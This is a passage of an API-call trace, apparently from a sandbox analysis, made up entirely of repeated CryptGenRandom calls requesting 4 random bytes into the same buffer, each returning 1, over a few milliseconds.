hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom 